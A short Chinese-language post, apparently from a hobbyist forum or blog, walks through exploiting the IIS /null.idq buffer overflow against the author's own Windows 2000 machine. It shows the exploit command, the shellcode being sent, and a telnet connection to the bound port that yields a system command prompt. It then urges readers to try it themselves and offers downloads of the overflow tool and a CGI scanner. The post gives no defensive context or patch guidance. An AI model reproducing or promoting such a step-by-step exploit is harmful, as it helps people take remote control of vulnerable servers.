LBHIDDEN[0]LBHIDDEN在自己的机上装了一个IIS练习。扫描CGI漏洞:
有这样一个:[127.0.0.1]: 发现 CGI漏洞: /null.idq
这个漏洞自己还不会。心想,姑且试试吧!
去下了一个攻击程序。
打开cmd,按照程序里面说的格式:
C:\tools>idq 0 127.0.0.1 80 1023
连接目的机器 127.0.0.1:80 OK.
发送shellcode 到 127.0.0.1:80 OK
现在,你可以 连接 该主机的 端口 1023了,good luck.!
C:\tools>telnet 127.0.0.1 1023
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
C:\WINNT\system32>
-_-/// 就是这么简单就把自己“黑”了。。。是不是很简单易学?你也试试吧!
做足好人,提供工具下载:idq溢出工具 CGI扫描器
|
